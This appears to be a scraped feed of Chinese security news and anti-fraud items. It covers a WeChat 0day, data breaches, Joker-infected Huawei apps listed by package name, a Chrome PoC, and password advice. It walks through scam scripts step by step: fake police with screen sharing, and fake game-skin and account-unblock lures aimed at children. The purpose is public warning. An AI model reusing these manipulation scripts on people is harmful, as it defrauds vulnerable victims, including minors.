黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatweb.exe便会加载shellcode执行,整个过程无文件落地,无新进程产生。

相关安全团队检测出wechatweb.exe存在内存恶意代码,继而排查出了0day漏洞,并在第一时间报告腾讯安全应急响应中心并协助其修复漏洞。
640 (1).png

目前,微信已修复漏洞并发布了更新版本,强烈建议大家立即将微信更新到3.2.1.141以上版本修复漏洞。官方下载链接:
https://dldir1.qq.com/weixin/Windows/WeChatSetup.exe


2、网络诈骗盯上未成年,家长们需要加强防范!

假期配手机,越玩越开心,很多孩子放假,就喜欢玩手机,父母们为了图方便,直接把手机给孩子,连带着一些密码也告诉孩子。这却给了诈骗分子可乘之机!


近日,南通市9岁女孩妮妮(化名)在用妈妈手机玩游戏时,收到一条“你要游戏皮肤吗”的消息。出于好奇,妮妮点开了消息。


诈骗分子和她介绍这个皮肤本来要几千块钱,现在只要一千八百块。妮妮心动了,在用妈妈的微信加入了对方提供的微信群后,几分钟内就发出了9个200元的微信红包,随后,妮妮被踢出了群聊。就这样,因为懵懂无知,妮妮落入了诈骗分子精心设计的圈套。

640 (2).png


害怕被责骂的妮妮思考再三,最终还是将事情的原委告诉了家长,家长这才反应过来,连忙带着女儿来到派出所报警。


无独有偶,16岁的小文(化名)在网上被陌生人邀请做刷单返利任务,在对方诱导下向对方支付宝转账7次,共计被骗1.7万余元。


近期,各类网络诈骗多瞄中未成年人下手,家长要加强风险教育,树立孩子正确的经济价值观。此外,家长要做好自身手机支付的安全措施,不要轻易告知孩子手机支付密码、银行支付密码等重要信息。



3、ParkMobile泄密事件暴露了2100万用户的车牌数据和手机号码

据知名网络安全新闻网站KrebsOnSecurity报道,有人正在网络犯罪论坛上出售在北美颇受欢迎的移动停车应用ParkMobile的2100万客户的账户信息。被盗数据包括客户的电子邮件地址、出生日期、电话号码、车牌号、哈希密码和邮寄地址。


640 (3).png

KrebsOnSecurity首次从纽约市的威胁情报公司Gemini Advisory那里听说了这一漏洞,该公司密切关注网络犯罪论坛。Gemini在一个俄语犯罪论坛上分享了一个新的销售线索,在附带的被盗数据截图中包含了一些用户的ParkMobile账户信息、电子邮件地址和电话号码,以及车辆的车牌号。


当被问及销售线索时,总部位于亚特兰大的ParkMobile表示,该公司在3月26日发布了一则通知,内容是 "发生了一起网络安全事件,与我们使用的一款第三方软件的漏洞有关"。



4、Swarmshop信用卡商店遭攻击,62万张银行卡记录曝光

Group-IB的研究人员在4月8日发表博客,Swarmshop信用卡商店的用户数据(个人信息和支付记录)于3月17日在网上泄露,并被发布在了另一个地下暗网论坛上,其中包含12344条信用卡商店管理员、卖家和买家的记录。


640.webp.jpg

此次泄露的数据还包括目标用户的昵称、哈希密码、联系方式、活动历史和当前余额等等。该数据库还公开了网站上交易的所有泄露数据:其中包括美国、加拿大、英国、中国、新加坡、法国、巴西、沙特阿拉伯和墨西哥的银行发行的623036张银行卡记录。除此之外,还有498份网上银行凭证和69592份美国社会保障号码和加拿大社会保险号码。


虽然,导致此次数据泄露事件的漏洞来源尚不清楚,但研究人员认为,根据曝光的数据记录显示,有两名信用卡商店的用户曾试图注入恶意脚本,并搜索网站联系人信息功能中的安全漏洞。



]]>
网络诈骗盯上未成年,家长们需加强防范! Thu, 22 Apr 2021 23:10:26 +0800 假期配手机

越玩越开心

很多孩子放假

就喜欢玩手机

父母们为了图方便

直接把手机给孩子

连带着一些密码也告诉孩子

这却给了诈骗分子可乘之机!

案件回溯

近日,南通市9岁女孩妮妮(化名)在用妈妈手机玩游戏时,收到一条“你要游戏皮肤吗”的消息。出于好奇,妮妮点开了消息。


诈骗分子和她介绍这个皮肤本来要几千块钱,现在只要一千八百块。妮妮心动了,在用妈妈的微信加入了对方提供的微信群,几分钟内就发出了9个200元的微信红包,随后,妮妮被踢出了群聊。就这样,因为懵懂无知,妮妮落入了诈骗分子精心设计的圈套


640 (4).png


害怕被责骂的妮妮思考再三,最终还是将事情的原委告诉了家长,家长这才反应过来,连忙带着女儿来到派出所报警。


无独有偶,16岁的小文(化名)在网上被陌生人邀请做刷单返利任务,在对方诱导下向对方支付宝转账7次,共计被骗1.7万余元

近期,各类网络诈骗多瞄中未成年人下手,家长要加强风险教育,树立孩子正确的经济价值观。


此外,家长要做好自身手机支付的安全措施,不要轻易告知孩子手机支付密码、银行支付密码等重要信息。

9999.jpg


]]>
微信被曝高危0day漏洞,建议立即更新 Thu, 22 Apr 2021 23:10:26 +0800

4月16日,微信PC版客户端被曝存在一个高危等级的在野0day漏洞。

WeChat now lets you report information on the Wuhan coronavirus | South  China Morning Post

黑客只需要通过微信发送一个特制web链接,用户一旦点击链接,微信PC(windows)版进程wechatweb.exe便会加载shellcode执行,整个过程无文件落地,无新进程产生。

相关安全团队检测出wechatweb.exe存在内存恶意代码,继而排查出了0day漏洞,并在第一时间报告腾讯安全应急响应中心并协助其修复漏洞。

1618636319_607a6e1f264fd58516d7c.png!small

目前,微信已修复漏洞并发布了更新版本,强烈建议大家立即将微信更新到3.2.1.141以上版本修复漏洞。官方下载链接:

https://dldir1.qq.com/weixin/Windows/WeChatSetup.exe

9999.jpg

]]>
Facebook高居“数据丢失耻辱榜”榜首 Thu, 22 Apr 2021 23:10:26 +0800        数据泄露几乎已经成为日常生活中的事实,但仍有一些数据泄露事件的影响比其他事件更大。软件公司Intact对公开数据进行了分析,看看在过去16年里,哪些公司遭遇了最大规模的数据泄露(涉及3万条以上的记录)。

Facebook以最多的数据泄露事件和最多的记录丢失事故位居榜首。该社交网络在报道期内遭遇了5起违规事件,丢失了86.45万条记录。

紧随Facebook,名列其后四名是:

万豪国际 丢失505200000条

MongoDB,477000000条

美国在线,92000000条

摩根大通,78600000条

大规模数据泄露事件最严重的年份是2011年,其次是2013年和2019年,而最常见的原因是黑客攻击、安全性差和媒介丢失/被盗。

您可以在Intact博客上了解更多信息:

https://www.intactsoftware.com/blog/visualising-biggest-data-breaches-history/

下面还有一张信息图,介绍了被黑客攻击最多的公司和被入侵最多的行业:

9999.jpg

]]>
骗子盯上手机App“屏幕共享”功能 当心把你银行卡钱转光光 Thu, 22 Apr 2021 23:10:26 +0800        骗子又盯上手机App“屏幕共享”功能了……如果有陌生人给你打电话,并提到腾讯视频会议、共享屏幕等字眼,你要当心了,这很可能是诈骗。近日,国家反诈中心发现,有不法分子利用腾讯会议的视频会议、共享屏幕等功能实施诈骗。

据了解,共享屏幕是把屏幕上显示的内容同步让对方看到,包括弹框显示短信、微信、其他App推送的内容。也就是说,你在手机上的任何操作,对方都能看到。

国家反诈中心工作人员表示,此类诈骗中,骗子往往诱导受害人使用腾讯会议内的共享屏幕功能。一旦受害人使用此功能,即使诈骗分子不主动询问,也能看到受害人手机上的所有信息,包括输入密码时跳动的字符、收到的验证码等,从而转走受害人卡内资金。

下面通过一位受害事主的受骗过程加以分析:

过程实录:

2021年1月17日14时18分,

我接到“+65945673963”给我打来的电话,通话时长18分37秒,对方自称是天津市公安局户籍管理科的民警,说我有个从越南到哈尔滨太平国际机场的非法入境记录。

反诈点评:

搜索一下可知,+65为前缀的电话号码是来自新加坡。目前的诈骗窝点主要都设在境外,所以看到这样的境外来电就要警惕了。

过程实录:

对方一再坚持,之后让我报警,并帮我转接到自称是哈尔滨市公安局的警察。接通后我把我的情况跟对方描述了一下,对方说帮我做登记。之后说我名下的民生银行的信用卡涉嫌洗钱,我跟对方说我没有办过民生银行的信用卡,对方称我的信息可能被冒用了。

反诈点评:

报警的正确方式是拨打110,而不是按照来电人提供的信息去拨打电话号码,因为接听电话的可能就是犯罪嫌疑人的同伙。

过程实录:

对方称让我配合调查,然后告诉了我一个QQ号让我添加。我添加完QQ之后,对方给我发过来一张警官证照片。之后对方通过QQ语音跟我说,让我下载腾讯会议,并在App内加入其会议继续跟其聊天。

反诈点评:

诈骗分子发送伪造的警官证骗取受害人的信任,还诱导受害人使用腾讯会议与其沟通,逃避监管。

过程实录:

过程中,对方让我下载搜狗浏览器,并输入其告诉我的网址,并在该网址输入“110”。我按照对方说的操作之后就进入一个“官方网站”,之后对方让我在其中一个位置输入我的身份证号,我输完之后,显示我确实因为洗钱案被通缉了。之后对方让我在腾讯会议内开通共享屏幕,说要审核我的资金,并让我拦截所有的电话和短信。

反诈点评:

犯罪嫌疑人提供的是虚假网站,此类网站在用浏览器登录时出现不安全的提示,如图:

犯罪嫌疑人让受害人拦截所有短信和来电其实就是担心警方采取劝阻措施,甚至让受害人瞒着亲人、朋友、同事去酒店开房,并阻断所有短信和来电,便于被其完全操控。

诈骗分子利用腾讯会议的共享屏幕功能可以第一时间直观地看到受害人在手机上的全部操作,包括登录手机银行账户转账的全过程,确保受害人完全在自己的掌控中。

过程实录:

2021年1月17日16时21分11秒从我工商银行的银行卡内向某银行账户内转账20000元;

2021年1月17日18时34分29秒从我工商银行卡内向某银行账户内转账32900元;

2021年1月18日9时41分16秒从我工商银行卡内向某银行账户内转账11000元;

2021年1月18日13时20分02秒从我的工商银行卡内向某银行账户内转账5600元;

……

都是通过手机银行转账。后来我发现自己被骗了。总共被骗89500元。

反诈点评:

受害人被诈骗分子成功操控,在2天时间内,一次又一次向对方指定的账号转款。实际中还有不少没有资金的受害人在诈骗分子唆使下,甚至通过网络借贷借钱向对方指定账号转钱。

诈骗分子使用的账号都是购买而来的账号,虽然开户人和账号都清楚,却无法跟其本人建立关联,警方很难从这些账号找到幕后是谁,这就是当前为何要在全国推行“断卡”行动,严厉打击整治惩戒非法开办贩卖电话卡、银行卡违法犯罪活动的原因。

如果受害人能及时发现被骗,第一时间拨打110报警,警方可以实施快速止付,力争将被骗资金冻结在账户中。此案中诈骗分子利用腾讯会议的共享屏幕已经完全掌握受害人转款情况,早就将赃款转移了,所以追查起来难度更大。

警方提示:不要与陌生人开启屏幕共享功能,这样的操作会让你在陌生人面前毫无秘密可言。涉及私人信息,特别是银行卡密码、验证码时,一定要谨慎、谨慎再谨慎。如若被骗,请立即拨打110报警。

9999.jpg



]]>
配送平台Mercato发生数据泄漏 却没向用户发出提醒 Thu, 22 Apr 2021 23:10:26 +0800        援引外媒 TechCrunch 报道,在线杂货配送初创公司 Mercato 在今年 1 月发生了用户数据泄漏事件,导致数万用户的个人隐私被窃取。导致泄漏的原因是公司托管在亚马逊云端的一个云存储桶被攻击,且没有受到保护。在事件发生之后该公司只是修复了这些数据,但没有向用户发出提醒。

QQ截图20210415101805.jpg

Mercato 成立于 2015 年,主要帮助超过 1000 家小型杂货店和专业食品店提供取餐和配送服务,用户不需要注册 Instacart 或亚马逊 Fresh 等送货服务。Mercato 在波士顿、芝加哥、洛杉矶和纽约开展业务,并在这些地区设有办公场所。

根据外媒 TechCrunch 获得的一份数据副本,该副本中包含了 7 万份订单,时间是在 2015 年 9 月至 2019 年 11 月的,包括了客户姓名和电子邮件地址、家庭地址和订单详情。每条记录还有用户用于下单的设备的 IP 地址。该数据集还包括公司高管的个人资料和订单细节。

目前还不清楚安全漏洞是如何发生的,因为亚马逊云上的存储桶默认是私有的,也不清楚公司是什么时候得知这一曝光事件的。公司需要向州检察长披露数据泄露或安全漏洞,但在法律要求的地方,比如加州,还没有发布通知。该数据集在加州有超过 1800 名用户,是该州数据泄露通知法规定的触发强制披露所需人数的三倍多。

9999.jpg



]]>
输入密码-密码错误-重置密码-输入新密码-新密码不能与原密码一致 Thu, 22 Apr 2021 23:10:26 +0800

这是不是你上网冲浪的日常?

(快把我身边的监视器拆掉!)

当需要用到密码的地方越来越多

比起把陌生人挡在个人隐私之外

密码存在的意义似乎更多是……

把自己挡在了门外

123456、111111

00000000、123456!@#

qwertyuiop 、p@ssw0rd

iloveyou

……

这些密码

大多数人不是曾经用过

就是正在用

大多数人都用过姓名首字母+生日做密码

也有人的密码中

能看到ta喜欢的人

比如

因为记不住多个密码

一位深爱团团的好青年

就在全部网站都使用同一个密码

只在必要时本着万变不离其宗的

原则进行简单修改

基准密码是 tuantuan20210504

需要有大写字母的变成 Tuantuan20210504

需要有特殊符号的变成 tuantuan_20210504

银行、家门电子锁取数字后六位变成 210504

手机屏幕解锁取后四位 0504

但……究竟是哪个网站需要大小写来着?

“密码”是什么?

日常生活中

你在使用银行卡的时候

有没有想过一个问题

为什么密码偏偏是6位数

而不是5位或者7位?

这其中有什么科学原理吗?

6位数密码确有其因

早前,有银行为了方便用户

把密码设置成4位数

但安全级别偏低

科学研究表明

大多数人的记忆广度大约为7个单位

从记忆力上来说

6位是最符合短时记忆的

且6位数的密码排列组合后

安全级别极高

也许有人会问:

我们的信息录入银行数据库后

工作人员是不是就可以

对我们的密码信息了如指掌呢?

答案是——“不可以”

因为数据库里虽然储存着我们的密码

密码都不是明文保存的

“外面”还裹着几层内容

说到这里

我们就需要理解一下密码的含义

生活中提到“密码”一词

大家通常以为就是每天接触的

计算机或手机开机“密码”

电子邮箱登录“密码”、微信“密码”

QQ“密码”、银行卡支付“密码”等

但这些“密码”,实际上是口令

口令只是进入个人计算机、手机

电子邮箱或者个人银行账户的“通行证”

它是一种简单、初级的身份认证手段

是最简易的密码

某软件登录界面

事实上

密码是一种“用来混淆的技术”

使用者希望将正常的信息

转变为无法识别的信息

但这种无法识别的信息部分是

可以再加工并恢复和破解的

如果黑客要破解的话

几千位数长的密码都可以很快破解出来

但银行系统对密码设置多了一种保障

如果密码多次输错

账户就会被锁上

避免了黑客的暴力破解

如何保护个人密码安全?

据荷兰《人民报》报道

2020年10月16日

一黑客猜中特朗普推特密码“maga2020”

并入侵了他的账户

此前

有媒体报道乌克兰军方某系统服务器

用户名和密码分别是“admin”和“123456”

事情是真是假暂且不说

但生活中随便起密码

所有账户都用同一个密码的人不在少数

提升安全意识

保护个人账户密码安全

是每个人的必修课

这份密码安全宝典送给你!

↓↓↓

左右滑动查看更多

虽然再高强度的密码

都不能完全保证一定不会被破解

但精心设置的复杂密码

能最大程度地增加他人破解密码的难度

这份“宝典”

请一定记在小本本上!

《中华人民共和国密码法》

2019年10月26日,十三届全国人大常委会第十四次会议通过了《中华人民共和国密码法》,已于2020年1月1日起正式实施。

《密码法》是我国密码领域的第一部法律,这是党的十九大以来,我国制定出台的维护国家安全的又一部重要法律。

与我们日常生活中常说的“密码”不同,《密码法》中的密码就是采用特定变换对信息等进行加密保护和安全认证的技术、产品和服务。

密码的功能主要有两个,一个是加密保护,一个是安全认证。密码的这两大特殊功能,决定了密码在网络空间中身份识别、安全隔离、完整性保护、信息加密和抗抵赖性等方面,具有不可替代的重要作用。

《密码法》究竟跟你我生活有多大关系?

简单地说,加密保护就是把明文变成密文,将原来可读的信息变成不能识别的符号序列。我们日常生活中常用的移动支付、扫码乘车等等都需要密码技术来保障安全。再比如,家家户户用的智能电表也应用了密码技术。

我们现在下载手机APP就可以交电费,或者使用充值卡缴费,方便快捷的背后都源于密码技术的安全保护。除了移动支付,大家熟悉的二代身份证、电子发票等都采用了密码技术,在保护公民身份信息、维护经济安全方面发挥了重要作用。正是由于密码技术的迅猛发展和广泛应用,催生了《密码法》的诞生。

保护国家安全,人人有责

今天是4月15日

是第六个全民国家安全教育日

关于国家安全所包含的内容

你究竟知道多少?

你是否了解公民维护国家安全

应该履行哪些义务?

你是否仍感觉国家安全

与你的日常生活距离很远?

“家是最小国,国是千万家”

国家安全不仅是国家的事

更与我们每一个人

每一个家庭息息相关

事实上

一些侵害国家安全的事情

很可能就发生在你我身边

也许你只是一位普通的摄影爱好者

某次去海边旅游无意间拍摄到军港照片

并将其上传到网络

也许你只是一位在校学生

给国外同学发送了一份重点实验室工作报告

也许你只是一位国企员工

在网络上回复一个敏感话题后

被某“杂志”约稿

也许你只是一位普通市民

家住军用机场附近

在被陌生人热情搭讪后

你与其彻夜长谈……

恐怕在一些人看来

这些行为非常普通

并无“玄机”可言

其实不然

正是这些我们在日常生活中的无心之举

却可能导致国家秘密的泄露

成为危害国家安全

损害国家利益的潜在威胁

信息化时代

每个人接触世界的机会大大增加

这种情况下

境外间谍情报机构瞄准的

已不再局限于涉密人员

有些普通人虽然一开始不掌握国家秘密

但是间谍可以通过多种手段

对其进行技能训练、势力培植

将其培养成搜集、窃取

我国家秘密的“棋子”“帮凶”

进而危害我国家安全和利益

维护国家安全

与每位公民息息相关

我们每个人都应当增强自身安全保密意识

提高维护国家安全的能力和水平

9999.jpg

]]>
细思极恐!你在熟睡,孩子却被人远程操控…深圳警方重要提醒 Thu, 22 Apr 2021 23:10:26 +0800 深圳龙岗的王先生(化名)心想自己肯定是眼花了,盯着账户里0.85元的余额,揉了揉眼睛,又刷新了几次。

还是0.85元,余额纹丝未动,转账记录却空空如也。

银行流水显示十几万存款转进了自己的微信和支付宝账户,然后就不翼而飞了!

睡前还特意看过一眼,这6位数的小宝贝就安静地躺在手机里。一觉醒来,账户却几乎被清零,只剩下手机依旧在床头,躺的很安详。

600.jpg

知道自己手机支付密码的只有老婆和11岁的闺女。

而老婆一脸埋怨,闺女满眼无辜。

手机送检未见异常,微信和支付宝官方都给出了“未发生异地操作”的回复。

老王没想到,人到中年,会一觉睡到破产。

情急之下,只能报警。

经过深圳龙岗警方缜密侦查,存款消失的秘密这才浮出了水面。         

原来,就在老王睡得呼噜震天响的那个晚上,闺女小王正在房间里刷着抖音,故事就始于抖音里一条来自陌生人的私信:

加Q群,免费领‘迷你世界’游戏皮肤

600 (1).jpg

那可是限量款的皮肤,小王用零花钱抽了几次都没抽到。

进群观望了一会儿,小王发现群里不少人都说领到了皮肤。

名额有限,小王赶紧申领。群主私信发来了一个二维码,可扫码后却显示:

账户存在未成年保护限制,无法领取

群主姐姐解释,要用大人的手机扫码才行:

“姐姐教你,你就跟爸爸说

手机借一下,我看点东西”

于是小王蹑手蹑脚进了老爸的房间,手机果然就在床头。

回到自己房间,小王用爸爸的手机扫码,可结果又显示:

信即将被封号!解封需身份验证

小王慌了神,爸爸的微信一旦被封号,偷玩游戏的事可就瞒不住了。

六神无主时,群主姐姐安慰她,按要求完成身份验证,就可以避免封号了。

怕小王不懂操作,群主姐姐还贴心地发来了视频通话。

但视频聊天里看不到人,屏幕上显示了一个二维码,一个略严肃的声音传来:

不然姐姐就帮不到你了

慌乱中,小王赶紧扫码,结果跳出了一个需要输入密码的界面。

小王开始担心对方骗她,可群主姐姐的话差点让她急哭:

姐姐是在帮你,不及时解封

你爸爸要去坐牢的!

这下不敢再质疑,小王一步步跟着视频聊天的指示操作,也记不清扫过多少二维码,输入过多少次密码…

直到爸爸账户里的钱转空了,才意识到自己闯了大祸。

赶紧删掉对方QQ号、聊天记录、转账记录,再悄悄把手机放回床头。

小王一通操作,老王始终毫无察觉。

//

直至民警上门,惶恐不安了多日的小王大哭了一场,这才说出了真相。

老王夫妻俩看着痛哭流涕的孩子,最初觉得生气和心疼,慢慢又感到后怕且懊悔。

谁能想到,当家长在睡梦中浑然不觉时,天真的孩子竟然被骗子遥控操纵着一切。

如果孩子不知道自己的支付密码,哪怕是锁屏密码,这一切也许就不会发生。

600 (2).jpg

案件发生后,龙岗警方全力侦查,关联到全国200余宗类似案件,并最终在多地共抓获17名犯罪嫌疑人,一举斩断了这条专门针对未成年人的“网络诈骗+网络盗窃”的黑色产业链。

600 (3).jpg

好奇、贪玩、单纯、恐惧,整个骗局利用了孩子的全部弱点进行心理和行为操控,让懵懂的孩子毫无招架之力。

互联网时代,不给孩子玩手机,显然已经不现实,但龙岗警方仍然郑重提醒诸位家长:

1.不要过早给孩子配备手机

2.即使配备,务必不要开通支付权限

3.家长的锁屏密码和支付密码不要告诉孩子

4.定期更换密码,别被贪玩的孩子瞄到

9999.jpg

]]>
华军软件园被查处 Thu, 22 Apr 2021 23:10:26 +0800 彻底的堕落!华军软件园被查处真是让大部分70、80后感慨,曾经公认的软件下载圣地就这么完蛋了。

曾经,很多80后下载软件只会去华军软件园,因为华军软件园速度快、安全无毒,而且绿色软件很多,口碑最好。但是随着移动互联网的发展,很多80后发现华军软件园变味了,原来的安全无毒的优势荡然无存,各种下三滥的捆绑成为常态。

比如,如果你在华军软件园下一个软件,你会遇到如下的坑:
1、故意你去错误的链接,下错位置
2、给你错误的链接下载不了
3、下了一个捆绑包默认安装一堆垃圾软件
4、下载的软件安装后自行给你安装一堆垃圾软件
5、下载的软件含毒
6、下载的软件更改浏览器主页
……

这种网站,不倒闭才怪,所以越来越多的人开始在软件官网下载,抛弃了华军软件园。

华军软件园这么做,原因可能还是因为在移动互联网时代,流量锐减,不得已只能靠捆绑软件获取高额受益吧,但是这个毕竟不是正路,走歪路走多了,还是会有报应的。

9999.jpg

]]>
手机里的色情片引来千万勒索,黑客:我们只攻击精英IT男 Thu, 22 Apr 2021 23:10:26 +0800 许多网络安全公司警告称,一种名为“双重勒索”(extortionware)的网上勒索方式正在崛起,黑客们正通过攻击受害人储存信息的方式,读取对方手机里储存的色情片信息,然后以此敲诈勒索受害者,迫使他们支付赎金。

网络安全专家表示,这种利用私人敏感信息勒索的趋势不仅可能影响企业运营,还会给受害者的个人声誉带来损失。

其中一个事例发生在最近,一群黑客号称他们发现了一名IT主管秘密收藏的色情片文件夹。

事件中被作为目标的是一家美国公司,但是该公司尚未公开表明曾被黑客入侵。

上个月,有一篇暗网上的博客文章讲述了这次黑客入侵事件,其中相关网络犯罪团伙直接点出了这名IT主管的名字,并称他的办公电脑上保存了这些色情片。

文章同时还附有一张他电脑媒体库的截图,上面显示有十多个以色情明星和色情网站命名的文件夹。

手机里的色情片引来千万勒索,黑客:我们只攻击精英IT男


这个臭名昭著的黑客群体写道:“感谢上帝给了我们(该名IT主管的姓名)。在他(自慰)的时候我们下载了几百GB与他公司客户有关的私人信息。上帝保佑他,祝他好运,阿门!”

这篇博客文章已被删除,专家们称,这通常暗示着勒索已经成功,黑客们已经得到足够的赎金以让他们恢复数据,并且不再公开更多细节。

涉事公司没有对置评请求做出回应。

同一家黑客团体目前还试图向另一家美国公用事业公司施压,勒索该公司支付赎金,他们贴出了该公司一名雇员在一家仅向会员开放的色情网站上使用的用户名和密码。

这群嚣张的黑客在他们的博客文章中写到:“我们一般会选择更精英的IT男作为我们的攻击对象。因为他们会比普通男性更介意自己偷偷看黄片的记录被公开,同时,他们也更有能力支付赎金以保护自己的名誉。再说嘛,这些精英的IT男,很多都是单身,肯定也会有那方面的需求嘛(指自慰)。”

犯罪团伙们不再像之前那样单打独斗而是会花时间及资源选定大型公司或公共机构作为目标进行攻击,要求对方支付巨额赎金,他们靠这样得到的收入每年预计可达数千万美元,有时一次行动的赎金总额便可达数百万美元。

“过去为了干扰一家公司,通常只是对他们的私人数据进行加密,但我们开始见到黑客自己下载这些数据(比如在色情网站注册的账号、浏览记录等)。”

“这意味着他们可以向受害者开出更高要价,因为把这些信息和数据公开卖给其他人的威胁力度很大。”

网络安全顾问丽莎·文图拉(Lisa Ventura)表示:“公司雇员不应该在电脑服务器上浏览和存储任何可能破坏公司名誉的东西。各机构应该为此向所有工作人员进行培训。”

“黑客的这种转变令人担忧,因为现在勒索攻击不仅更加频繁,还变得更为复杂。”“在发现名誉损失等因素之后,他们便有了更多筹码向受害者索取金钱。”

由于受害者不愿曝光,且通常这种事件会被刻意掩盖,我们很难估计勒索攻击造成的整体财产损失。

而根据网络数据安全的专家预计,2020年发生的勒索软件攻击事件在赎金支付、电脑停摆及受干扰方面造成的经济损失可达1700亿美元。

9999.jpg

]]>
湖南电信网络遭黑客攻击崩溃:系统正进行升级 马上恢复 Thu, 22 Apr 2021 23:10:26 +0800        今日,有网友在微博中爆料,湖南电信网络突然崩了,有网友表示“上班上着上着,突然网络没了。”不少网友的微博也证实了湖南电信网络的崩溃。对此,有网友表示,“还以为是没有话费了”,“我还以为我手机的问题,冤枉它了 ”。

在这之前,一张爆料截图在网上流传,截图反映写到,接电信通知:整个湖南省,电信,联通,移动的固网全部间断瘫痪。

电信给出的答复是境外黑客DDOS洪水攻击,总出口和入口堵塞导致。

据九派新闻联系上湖南电信一名维修工作人员,对方表示目前系统正在进行升级,过段时间就会回复正常。对于网上流传的电信通知,他表示里面的内容属实,是公司发布的通知。

9999.jpg

]]>
华为安卓用户:“小丑”竟是我自己? 注意警惕Joker恶意软件 Thu, 22 Apr 2021 23:10:26 +0800 Joker(小丑)恶意软件近年来似乎活动不断,入侵安卓应用商店感染应用程序,并不断升级隐藏和伪装手段。前有Joker实施窃听,后有Joker开展广告欺诈。

4月12日,Doctor Web的一份报告指出,已有超过50万名华为用户从该公司的官方安卓商店下载了已遭Joker恶意软件感染的应用程序,这些应用程序订阅了高级移动服务。

研究人员在AppGallery中发现了10个看似正常的应用程序,然而,其中却包含了连接恶意命令和控制服务器以接收配置和其他组件的代码。

功能性应用伪装

杀毒厂商Doctor Web的一份报告指出,恶意应用程序保留了其广告功能,但下载了使用户订阅高级移动服务的组件。

为了让用户无法察觉到这些已被感染的应用程序请求访问通知,他们拦截了订阅服务的验证码。根据研究人员的说法,尽管攻击者可以随时修改这个拦截的限制,但该恶意软件最多只可以使用户订阅五项服务。

感染恶意程序的APP包含虚拟键盘、相机应用程序、在线信使、贴纸收集、桌面启动器、着色程序和游戏等。

资料来源:Doctor Web

Doctor Web研究人员表示,这些应用程序已经被超过538000名华为用户下载。

资料来源:Doctor Web

Doctor Web向华为汇报了这些恶意的应用程序,该公司已经将其从AppGallery中删除。尽管新用户无法再下载它们,但是已经安装的用户需要手动卸载。下表列出了相关应用程序及其包的名称:

应用名称

包名

超级键盘

com.nova.superkeyboard

快乐涂色

com.colour.syuhgbvcff

Fun Color

com.funcolor.toucheffects

2021新型键盘

com.newyear.onekeyboard

相机MX

com.sdkfj.uhbnji.dsfeff

BeautyPlus相机

com.beautyplus.excetwa.camera

彩色滚动图标

com.hwcolor.jinbao.rollingicon

Funney Meme表情符号

com.meme.rouijhhkl

Happy Tapping

com.tap.tap.duedd

All-in-One Messenger

com.messenger.sjdoifo

研究人员说,和被感染的应用程序在AppGallery中下载的相同模块一样,该模块也存在于其他版本的Joker恶意软件所感染的Google Play的其他应用程序中。

一旦激活,该恶意软件将会与它的远程服务器通信,并获取配置文件,该文件包含任务列表、高级服务网站、模仿用户交互的JavaScript。

Joker恶意软件的历史可追溯到2017年,通过Google Play商店分发的应用程序中不断活跃。

卡巴斯基(Kaspersky)的Android恶意软件分析师Tatyana Shishkova在2019年10月发布了约70多个被入侵的应用程序的推文,这些应用程序已将其纳入官方商店。

而且有关Google Play中恶意软件的报告不断涌现。2020年初,谷歌宣布自2017年以来,它已删除了约1700个被Joker感染的应用程序。即使在2020年7月,它仍然可以绕过Google的防御。

9999.jpg

]]>
Swarmshop信用卡商店遭攻击,62万张银行卡记录曝光 Thu, 22 Apr 2021 23:10:26 +0800

Group-IB的研究人员在4月8日发表博客,Swarmshop信用卡商店的用户数据(个人信息和支付记录)于3月17日在网上泄露,并被发布在了另一个地下暗网论坛上,其中包含12344条信用卡商店管理员、卖家和买家的记录。

此次泄露的数据还包括目标用户的昵称、哈希密码、联系方式、活动历史和当前余额等等。该数据库还公开了网站上交易的所有泄露数据:其中包括美国、加拿大、英国、中国、新加坡、法国、巴西、沙特阿拉伯和墨西哥的银行发行的623036张银行卡记录。除此之外,还有498份网上银行凭证和69592份美国社会保障号码和加拿大社会保险号码。

虽然,导致此次数据泄露事件的漏洞来源尚不清楚,但研究人员认为,根据曝光的数据记录显示,有两名信用卡商店的用户曾试图注入恶意脚本,并搜索网站联系人信息功能中的安全漏洞。Group-IB的研究人员在分析报告中提到,目前还无法判断这一攻击行为是否与本次数据泄露事件有关联。

据Group IB研究人员称,Swarmshop信用卡商店大概从2019年4月开始运营。截至2021年3月,它的用户基数已经超过了12000,销售的支付卡记录超过60万条。到2021年3月,所有账户上的存款总额为18145.73美元,这是一个很低的数字,因为信用卡商店的用户不会倾向于在账户上存储大笔资金,只在必要时将余额加满进行支付。

JupiterOne的首席营销官泰勒·希尔兹(Tyler Shields)表示:

“这几十年来,黑客一直都在攻击其他黑客。其目的主要是为了获得新的黑客工具、泄漏的数据、支付卡信息、个人识别信息和其他有价值的数据。毫无疑问,获取这些信息最好的方法,就是直接去攻击那些已经获取到了这些信息的人。这样想的话,那么Swarmshop信用卡商店受到多次攻击的情况也就不足为奇了。网络犯罪分子跟普通用户一样,也会存在着各种各样的安全问题。这也表明,无论你是谁,网络安全都是一个难题。”

Horizon3.AI的首席架构师纳文•桑卡瓦利(Naveen Sunkavally)认为:“此次数据泄露事件表明,没有人能够免受网络攻击,包括网络犯罪分子本身。”

Naveen Sunkavally在接受采访时说到:“最令人担忧的是用户信用卡信息和网上银行凭证在网络上的泛滥。攻击者不需要像电影里那样利用0 day漏洞进行攻击,他们通常可以通过攻击其他黑客并从中窃取凭据登录。现在,很多人都会在不同的系统中重复使用他们的凭证,而攻击者又可以支配很多公开数据。这也就意味着,攻击者可以在各种系统中使用这些凭据,并且不会触发任何安全预警,因为他们可以像合法用户一样去操作。最终,受影响的是目标用户。”

DomainTools的高级安全研究员查德·安德森(Chad Anderson)补充说到,即使在更大的商业化恶意软件领域,黑客也会试图以其他黑客的工具为目标,利用恶意软件中的漏洞感染对方的工具。

9999.jpg

]]>
Chrome和Edge远程代码执行0Day漏洞曝光 Thu, 22 Apr 2021 23:10:26 +0800 北京时间4月13日凌晨,安全研究人员Rajvardhan Agarwal在推特上发布了一个可远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本的谷歌Chrome浏览器和微软Edge上运行。

Rajvardhan Agarwal推特截图

Agarwal发布的漏洞,是基于Chromium内核的浏览器中V8 JavaScript引擎的远程代码执行漏洞,同时还发布了该漏洞的PoC(概念验证)

当Chrome或Edge浏览器加载PoC HTML文件及其对应的JavaScript文件时,该漏洞可被利用来启动Windows计算器(calc.exe)程序。

